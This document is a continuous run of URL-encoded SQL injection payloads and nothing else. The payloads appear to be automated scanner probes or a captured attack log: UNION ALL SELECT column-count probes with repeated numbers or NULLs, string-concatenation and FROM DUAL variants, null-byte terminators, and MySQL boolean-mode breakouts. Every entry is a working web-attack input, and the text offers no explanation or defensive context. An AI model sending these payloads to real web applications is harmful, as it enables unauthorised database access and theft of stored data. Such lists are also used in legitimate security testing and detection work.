-9177%27%20%7C%7C%20%28SELECT%206576%20WHERE%208085%3D8085%20UNION%20ALL%20SELECT%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%2C%208085%00%20%29%20%7C%7C%20%27 -3522%27%20%7C%7C%20%28SELECT%203857%20WHERE%209489%3D9489%20UNION%20ALL%20SELECT%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%00%20%29%20%7C%7C%20%27 -2450%27%20%7C%7C%20%28SELECT%204543%20WHERE%204969%3D4969%20UNION%20ALL%20SELECT%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%00%20%29%20%7C%7C%20%27 -5275%27%20%7C%7C%20%28SELECT%208198%20WHERE%206322%3D6322%20UNION%20ALL%20SELECT%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%2C%206322%00%20%29%20%7C%7C%20%27 -9604%27%20%7C%7C%20%28SELECT%207880%20WHERE%201344%3D1344%20UNION%20ALL%20SELECT%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%2C%201344%00%20%29%20%7C%7C%20%27 -8168%20%2B%20%28SELECT%203696%20FROM%20DUAL%20WHERE%207916%3D7916%20UNION%20ALL%20SELECT%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%00%20%29 -9776%20%2B%20%28SELECT%203401%20FROM%20DUAL%20WHERE%208934%3D8934%20UNION%20ALL%20SELECT%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%00%20%29 -5031%20%2B%20%28SELECT%204835%20FROM%20DUAL%20WHERE%205473%3D5473%20UNION%20ALL%20SELECT%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%00%20%29 -1167%20%2B%20%28SELECT%202016%20FROM%20DUAL%20WHERE%204916%3D4916%20UNION%20ALL%20SELECT%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%00%20%29 -8307%20%2B%20%28SELECT%209382%20FROM%20DUAL%20WHERE%204178%3D4178%20UNION%20ALL%20SELECT%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%00%20%29 -2597%20%2B%20%28SELECT%205574%20FROM%20DUAL%20WHERE%209406%3D9406%20UNION%20ALL%20SELECT%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%00%20%29 -5858%20%2B%20%28SELECT%207970%20FROM%20DUAL%20WHERE%207287%3D7287%20UNION%20ALL%20SELECT%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%00%20%29 -3558%20%2B%20%28SELECT%205464%20FROM%20DUAL%20WHERE%207797%3D7797%20UNION%20ALL%20SELECT%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%00%20%29 -2055%20%2B%20%28SELECT%201707%20FROM%20DUAL%20WHERE%201923%3D1923%20UNION%20ALL%20SELECT%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%00%20%29 -6183%20%2B%20%28SELECT%201980%20FROM%20DUAL%20WHERE%203185%3D3185%20UNION%20ALL%20SELECT%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%00%20%29 -1078%20%2B%20%28SELECT%202094%20WHERE%205169%3D5169%20UNION%20ALL%20SELECT%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%00%20%29 -1813%20%2B%20%28SELECT%207104%20WHERE%201971%3D1971%20UNION%20ALL%20SELECT%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%00%20%29 -8078%20%2B%20%28SELECT%204774%20WHERE%202136%3D2136%20UNION%20ALL%20SELECT%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%00%20%29 -5114%20%2B%20%28SELECT%205277%20WHERE%202722%3D2722%20UNION%20ALL%20SELECT%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%00%20%29 -3355%20%2B%20%28SELECT%203888%20WHERE%203606%3D3606%20UNION%20ALL%20SELECT%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%2C%203606%00%20%29 -6569%20%2B%20%28SELECT%203849%20WHERE%207155%3D7155%20UNION%20ALL%20SELECT%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%00%20%29 -5810%20%2B%20%28SELECT%206233%20WHERE%202913%3D2913%20UNION%20ALL%20SELECT%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%00%20%29 -4456%20%2B%20%28SELECT%203639%20WHERE%208695%3D8695%20UNION%20ALL%20SELECT%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%00%20%29 -6743%20%2B%20%28SELECT%208704%20WHERE%204175%3D4175%20UNION%20ALL%20SELECT%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%2C%204175%00%20%29 -1831%20%2B%20%28SELECT%205897%20WHERE%208970%3D8970%20UNION%20ALL%20SELECT%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%2C%208970%00%20%29 -3566%27%20%2B%20%28SELECT%20%27pKFt%27%20FROM%20DUAL%20WHERE%203359%3D3359%20UNION%20ALL%20SELECT%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%2C%203359%00%20%29%20%2B%20%27 -1893%27%20%2B%20%28SELECT%20%27ElYZ%27%20FROM%20DUAL%20WHERE%205252%3D5252%20UNION%20ALL%20SELECT%205252%2C%205252%2C%205252%2C%205252%2C%205252%2C%205252%2C%205252%2C%205252%2C%205252%2C%205252%2C%205252%2C%205252%00%20%29%20%2B%20%27 -3646%27%20%2B%20%28SELECT%20%27aMQo%27%20FROM%20DUAL%20WHERE%201398%3D1398%20UNION%20ALL%20SELECT%201398%2C%201398%2C%201398%2C%201398%2C%201398%2C%201398%2C%201398%2C%201398%2C%201398%2C%201398%2C%201398%2C%201398%2C%201398%00%20%29%20%2B%20%27 -6559%27%20%2B%20%28SELECT%20%27kQOc%27%20FROM%20DUAL%20WHERE%207648%3D7648%20UNION%20ALL%20SELECT%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%00%20%29%20%2B%20%27 -3413%27%20%2B%20%28SELECT%20%27bSrh%27%20FROM%20DUAL%20WHERE%208305%3D8305%20UNION%20ALL%20SELECT%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%2C%208305%00%20%29%20%2B%20%27 -7079%27%20%2B%20%28SELECT%20%27uWnf%27%20FROM%20DUAL%20WHERE%201280%3D1280%20UNION%20ALL%20SELECT%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%00%20%29%20%2B%20%27 -6636%27%20%2B%20%28SELECT%20%27snVC%27%20FROM%20DUAL%20WHERE%204836%3D4836%20UNION%20ALL%20SELECT%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%00%20%29%20%2B%20%27 -8833%27%20%2B%20%28SELECT%20%27nxWc%27%20FROM%20DUAL%20WHERE%202188%3D2188%20UNION%20ALL%20SELECT%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%2C%202188%00%20%29%20%2B%20%27 -9507%27%20%2B%20%28SELECT%20%27dvKA%27%20FROM%20DUAL%20WHERE%208875%3D8875%20UNION%20ALL%20SELECT%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%00%20%29%20%2B%20%27 -1832%27%20%2B%20%28SELECT%20%27JNDT%27%20FROM%20DUAL%20WHERE%205118%3D5118%20UNION%20ALL%20SELECT%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%2C%205118%00%20%29%20%2B%20%27 -7480%27%20%2B%20%28SELECT%20%27FUOJ%27%20WHERE%205909%3D5909%20UNION%20ALL%20SELECT%205909%2C%205909%2C%205909%2C%205909%2C%205909%2C%205909%2C%205909%2C%205909%2C%205909%2C%205909%2C%205909%00%20%29%20%2B%20%27 -3609%27%20%2B%20%28SELECT%20%27bIpv%27%20WHERE%203972%3D3972%20UNION%20ALL%20SELECT%203972%2C%203972%2C%203972%2C%203972%2C%203972%2C%203972%2C%203972%2C%203972%2C%203972%2C%203972%2C%203972%2C%203972%00%20%29%20%2B%20%27 -2536%27%20%2B%20%28SELECT%20%27AhVo%27%20WHERE%206964%3D6964%20UNION%20ALL%20SELECT%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%00%20%29%20%2B%20%27 -7110%27%20%2B%20%28SELECT%20%27PBFz%27%20WHERE%206786%3D6786%20UNION%20ALL%20SELECT%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%00%20%29%20%2B%20%27 -3946%27%20%2B%20%28SELECT%20%27GUre%27%20WHERE%206223%3D6223%20UNION%20ALL%20SELECT%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%2C%206223%00%20%29%20%2B%20%27 -7223%27%20%2B%20%28SELECT%20%27zewB%27%20WHERE%208789%3D8789%20UNION%20ALL%20SELECT%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%2C%208789%00%20%29%20%2B%20%27 -8972%27%20%2B%20%28SELECT%20%27Woaj%27%20WHERE%208409%3D8409%20UNION%20ALL%20SELECT%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%2C%208409%00%20%29%20%2B%20%27 -8808%27%20%2B%20%28SELECT%20%27YqaN%27%20WHERE%201005%3D1005%20UNION%20ALL%20SELECT%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%00%20%29%20%2B%20%27 -1538%27%20%2B%20%28SELECT%20%27qTSW%27%20WHERE%209644%3D9644%20UNION%20ALL%20SELECT%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%00%20%29%20%2B%20%27 -3221%27%20%2B%20%28SELECT%20%27WCgm%27%20WHERE%209362%3D9362%20UNION%20ALL%20SELECT%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%00%20%29%20%2B%20%27 -8724%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%2C%203249%00%20%23 -3301%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%00%20%23 -9237%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%00%20%23 -5983%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%2C%206983%00%20%23 -2601%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%2C%207853%00%20%23 -4004%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%2C%206892%00%20%23 -9022%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%2C%207192%00%20%23 -8668%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%00%20%23 -8496%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%00%20%23 -5314%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%2C%205969%00%20%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 